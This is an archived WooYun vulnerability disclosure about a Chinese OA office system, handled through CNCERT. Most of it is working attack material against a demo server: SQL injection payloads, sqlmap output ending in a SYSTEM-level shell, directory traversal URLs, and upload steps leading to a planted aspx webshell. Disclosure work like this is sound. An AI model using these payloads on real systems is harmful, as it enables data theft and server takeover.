当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066515

漏洞标题:某OA系统多处DBA权限SQL注入/目录遍历/GetShell漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-06-28 12:41

修复时间:2014-09-26 12:42

公开时间:2014-09-26 12:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-28: 细节已通知厂商并且等待厂商处理中
2014-07-03: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向第三方安全合作伙伴开放
2014-08-27: 细节向核心白帽子及相关领域专家公开
2014-09-06: 细节向普通白帽子公开
2014-09-16: 细节向实习白帽子公开
2014-09-26: 细节向公众公开

简要描述:

某OA系统多处DBA权限SQL注入可直接GetShell,目录遍历漏洞,GetShell漏洞的打包

详细说明:

广州名将OA协同办公系统
官方:http://www.yf1668.com/index.asp
官网右侧有大量客户案例
官网demo测试:http://112.124.41.23:38888/
0x001
第一处前台无需登陆SQL注入:
在登陆页面:

链接:http://112.124.41.23:38888/Default.aspx
postdata:__VIEWSTATE=%2FwEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ%2BW5v%2BW3nuW4guWQjeWwhui9r%2BS7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM%2B32pyEEFV0&TxtUserName=111111&TxtUserPwd=111111&ImageButton1.x=21&ImageButton1.y=10&XGuid=&XDigest=&__EVENTVALIDATION=%2FwEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r%2FjBs%2BiDZ4frcisA1TU5q4Rwb%2Bw9uNO


用户名TxtUserName存在注入:

---
Place: POST
Parameter: TxtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ+W5v+W3nuW4guWQjeWwhui9r+S7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM+32pyEEFV0&TxtUserName=123'; WAITFOR DELAY '0:0:5'--&TxtUserPwd=123&ImageButton1.x=55&ImageButton1.y=13&XGuid=&XDigest=&__EVENTVALIDATION=/wEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r/jBs+iDZ4frcisA1TU5q4Rwb+w9uNO
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ+W5v+W3nuW4guWQjeWwhui9r+S7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM+32pyEEFV0&TxtUserName=123' WAITFOR DELAY '0:0:5'--&TxtUserPwd=123&ImageButton1.x=55&ImageButton1.y=13&XGuid=&XDigest=&__EVENTVALIDATION=/wEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r/jBs+iDZ4frcisA1TU5q4Rwb+w9uNO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
tables
---
[11:58:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:58:16] [INFO] fetching tables for database: FGOA
[11:58:16] [INFO] fetching number of tables for database 'FGOA'
[11:58:16] [INFO] resumed: 121
[11:58:16] [INFO] resumed: dbo.dtproperties
[11:58:16] [INFO] resumed: dbo.ERPAnPai
[11:58:16] [INFO] resumed: dbo.ERPBaoJia
[11:58:16] [INFO] resumed: dbo.ERPBaoXiao
[11:58:16] [INFO] resumed: dbo.ERPBBSBanKuai
[11:58:16] [INFO] resumed: dbo.ERPBBSTieZi
[11:58:16] [INFO] resumed: dbo.ERPBook
[11:58:16] [INFO] resumed: dbo.ERPBookJieHuan
[11:58:16] [INFO] resumed: dbo.ERPBuMen
[11:58:16] [INFO] resumed: dbo.ERPBuyChanPin
[11:58:16] [INFO] resumed: dbo.ERPBuyOrder
[11:58:16] [INFO] resumed: dbo.ERPCarBaoXian
[11:58:16] [INFO] resumed: dbo.ERPCarBaoYang
[11:58:16] [INFO] resumed: dbo.ERPCarInfo
[11:58:16] [INFO] resumed: dbo.ERPCarJiaYou
[11:58:16] [INFO] resumed: dbo.ERPCarLog
[11:58:16] [INFO] resumed: dbo.ERPCarShiYong
[11:58:16] [INFO] resumed: dbo.ERPCarWeiHu
[11:58:16] [INFO] resumed: dbo.ERPCarWeiZhang
[11:58:16] [INFO] resumed: dbo.ERPContract
[11:58:16] [INFO] resumed: dbo.ERPContractChanPin
[11:58:16] [INFO] resumed: dbo.ERPCrmSetting
[11:58:16] [INFO] resumed: dbo.ERPCustomFuWu
[11:58:16] [INFO] resumed: dbo.ERPCustomHuiFang
[11:58:16] [INFO] resumed: dbo.ERPCustomInfo
[11:58:16] [INFO] resumed: dbo.ERPCustomNeed
[11:58:16] [INFO] resumed: dbo.ERPCYDIC
[11:58:16] [INFO] resumed: dbo.ERPDangAn
[11:58:16] [INFO] resumed: dbo.ERPDanWeiInfo
[11:58:16] [INFO] resumed: dbo.ERPFileList
[11:58:16] [INFO] resumed: dbo.ERPGongGao
[11:58:16] [INFO] resumed: dbo.ERPGuDing
[11:58:16] [INFO] resumed: dbo.ERPGuDingJiLu
[11:58:16] [INFO] resumed: dbo.ERPH\x7fiBap
[11:58:16] [INFO] resumed: dbo.ERPHuiYuan
[11:58:16] [INFO] resumed: dbo.ERPJiangCheng
[11:58:16] [INFO] resumed: dbo.ERPJiangChengZhiDu
[11:58:16] [INFO] resumed: dbo.ERPJianLi
[11:58:16] [INFO] resumed: dbo.ERPJiaoSe
[11:58:16] [INFO] resumed: dbo.ERPJinDu
[11:58:16] [INFO] resumed: dbo.ERPJiXiao
[11:58:16] [INFO] resumed: dbo.ERPJiXiaoCanShu
[11:58:16] [INFO] resumed: dbo.ERPJSDIC
[11:58:16] [INFO] resumed: dbo.ERPJuanKu
[11:58:16] [INFO] resumed: dbo.ERPJXDetails
[11:58:16] [INFO] resumed: dbo.ERPKaoQin
[11:58:16] [INFO] resumed: dbo.ERPKaoQinSetting
......


这里的SQL注入可直接GetShell,system权限:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    'nt authority\systgm'
os-shell>


第二处SQL注入:
参数WorkFlowID存在sql注入
http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 and 1=1&FormID=23

888.png


http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 and 1=2&FormID=23

999.png


即可证明,不在跑出数据证明了。
第三处SQL注入:

链接:http://112.124.41.23:38888/SystemManage/SystemUser.aspx
postdata:__VIEWSTATE=%2FwEPDwUJNzQ5NTExNzY5D2QWAmYPZBYOAgYPDxYCHgdWaXNpYmxlaGRkAggPDxYCHwBoZGQCCg8PFgIfAGhkZAIMDw8WAh8AaGRkAg4PPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudGZkZAIYDw8WAh4EVGV4dAUBMWRkAhoPDxYCHwQFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUMSW1hZ2VCdXR0b240BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkRMJuhMoRzNdhfXN1TyYBGMVYJQ4%3D&TextBox2=&TextBox1=1111111111111%' and '%'='&ImageButton4.x=28&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWCwLHn7H3CgLs0fbZDALs0bLrBgLSwv2aBALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTKqv2Ep5xY8Ul5GGs0ASZH%2BZZkH


参数TextBox1存在sql注入。
0x002目录遍历漏洞
可以遍历真个服务器的内容,C盘,D盘等。
http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=C:\Program Files

111.png


http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\

222.png


当前网站目录:
http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\OA_SITE\FGOA2014\Web9.2.2.7

333.png


0x003 任意文件上传GetShell
通过SQL注入拿到账户后登陆
桌面 >> 系统管理 >> 文件上传设置 这里可修改上传文件类型。

444.png


然后再知识文档,个人文档,桌面 >> 文件中心 >> 添加个人文件

555.png


最后在个人文档里面就有上传后的aspx文件,然后打开查看即可得到shell地址

666.png


最后的shell地址为:
http://112.124.41.23:38888/UploadFile/635395514206637345.aspx

777.png

漏洞证明:

777.png

修复方案:

严格过滤,严格控制目录权限,严格限制上传

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-03 11:16

厂商回复:

CNVD确认所述DEMO情况(不涉及政府和重要部门,暂未进行互联网实例验证),由CNVD通过公开联系方式向软件生产厂商通报。

最新状态:

暂无